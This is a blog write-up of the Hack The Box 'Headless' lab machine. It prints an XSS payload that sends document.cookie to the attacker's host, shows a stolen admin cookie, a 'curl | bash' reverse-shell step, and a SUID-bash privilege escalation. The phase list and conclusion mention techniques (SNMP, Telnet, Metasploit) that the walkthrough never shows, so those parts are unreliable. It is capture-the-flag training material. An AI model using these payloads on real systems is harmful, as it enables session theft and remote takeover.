Home
CyberSecurity
Hack The Box

Headless HTB Writeup | HacktheBox

Headless HTB Writeup or Headless HTB walkthrough
Headless HTB Writeup

Introduction

In this Post, Let’s See how to CTF Headless from hackthebox and if you have any doubts, comment down below 👇🏾


Hacking Phases in Headless 

Getting into the system initially.Checking open TCP ports using Nmap.Retrieving information from Telnet banners.Looking for vulnerabilities to exploit.Enumerating information through SNMP.Gaining access to a user shell.Obtaining the user flag.Escalating privileges.Using Metasploit for port forwarding.Identifying ways to escalate privileges.Exploiting vulnerabilities like file read to gain access.Obtaining the root flag.

Let’s Begin

Let’s Hack Headless HTB 😌

Enumeration

Direct https://app.hackthebox.com/machines/Headless

Name: Headless

Difficulty: Easy

User points: +20

Root points: +25

OS: Linux

Hi everyone, I want to share a walkthrough of this machine of the Season 4, one of the latest, its based on linux and with an easy dificulty. Here we can find a Cross Site Scripting (XSS) vulnerability that we have to exploit in the way to get an administrator cookie to access to a restricted page and then establish a conection with our machine.

User’s Flag:

Lets start with the same of all.

nmap 10.129.131.95 -A -p- -T4

There we find two special ports: 22-ssh and 5000-upnp. So lets visit our ip address with this port and lets see what happen.

Lets try to find additional directories on the way to get more information.

dirsearch -u <http://10.129.131.95:5000>

If we visit the dashboard we are unable to access, but in the supports page there is our oportunity to exploit it and get access to the machine.

Lets try the next payload:

<img src=x onerror=fetch('http://<YourIP>/?c='+document.cookie);>

And what happen if we submit it?

We successful discovered that its vulnerable to Cross Site Scripting (XSS), now we have to use Burpsuite to send our payload, and with a server open on python in the way to catch the response try to access to the dashboard page

BurpSuite:

we have to modify this package adding our payload at the ending separating it with “;” and in our User-Agent field.

I suggest to send it to repeater (Ctrl+R) and send many times because at the first instance its hard to get it.

Server:

Just start a simple http server with python in the port 80, I suggest to use python, we could do it with php, but I got a better response with python.

python3 -m http.server 80

After a few minutes we got it!

Finally here’s the admin cookie:

Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

Now after getting the admins cookie, we are able to visit the dashboard, change the cookie and we got this page

Now we have to stablish a connection with our machine. So, lets start a connection with netcat

nc -lvnp 9000

If we intercept the packet and try directly to stablish a connection with our machine we don't have a right answer

But, what happen if we curl our machine and execute it with bash?

curl http://<YourIP>/shell.sh|bash

If we look to our nc server…

We are into!

Root’s Flag:

Lets see what we are able to

If we cat the file and analyse it, we can find that its manipulating a file name “initdb.sh

Okay, we can create the file changing the permitions of bash with our users bit, and then run syscheck

Finely run bash

/bin/bash -p

Cat the /root/root.txt and that's all

Conclusion

This device offered an enjoyable and educational journey, during which we explored a range of topics such as TCP port scanning, service enumeration, UDP port scanning, SNMP enumeration, exploiting password disclosure vulnerabilities, port forwarding using Metasploit, manual port forwarding, file transfer, understanding file permissions, and exploiting file read vulnerabilities to retrieve the root.txt file through two distinct methods.

FAQs

  1. What is HacktheBox?
    • HacktheBox is an online platform that offers a range of virtual machines for users to practice their penetration testing skills in a legal and controlled environment.
  2. What is "Headless" on HacktheBox?
    • "Headless" refers to one of the machines available on HacktheBox, presenting users with various cybersecurity challenges to overcome.
  3. How do you obtain the user flag?
    • Obtaining the user flag involves exploring the compromised system to locate the designated file containing the flag. This often requires executing commands and navigating through directories.
  4. What is privilege escalation?
    • Privilege escalation is the process of gaining higher levels of access on a system than initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges.
  5. How do you escalate privileges in a hack?
    • Privilege escalation can be achieved by exploiting vulnerabilities such as misconfigured services, weak file permissions, or known software vulnerabilities.

#CyberSecurity #Hack The Box #HackerHQ

Post a Comment

Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
More Details
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.